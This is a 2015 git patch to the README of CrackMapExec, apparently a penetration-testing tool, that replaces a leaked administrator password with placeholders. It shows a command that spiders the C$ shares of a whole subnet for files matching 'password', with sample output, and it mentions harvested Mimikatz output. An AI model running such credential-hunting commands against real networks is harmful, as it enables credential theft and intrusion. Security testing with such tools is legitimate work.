From 2705e7e6ab2e92fdbb8647334c73c7990c9974ab Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Wed, 19 Aug 2015 19:26:51 +0200 Subject: [PATCH] forgot to censor username and password from readme, oops! (yes I changed them) --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0ecc7379..06d6c376 100644 --- a/README.md +++ b/README.md @@ -118,7 +118,7 @@ Mimikatz's output then gets POST'ed back to our HTTP server, saved to a log file Lets Spider the C$ share starting from the ```Users``` folder for the pattern ```password``` in all files and directories (concurrently): ``` -#~ python crackmapexec.py -t 150 172.16.206.0/24 -u 'Administrator' -p 'crackmeumofo' --spider Users --depth 10 --pattern password +#~ python crackmapexec.py -t 150 172.16.206.0/24 -u username -p password --spider Users --depth 10 --pattern password [+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC) [+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC) [+] 172.16.206.132:445 DRUGCOMPANY-PC Started spidering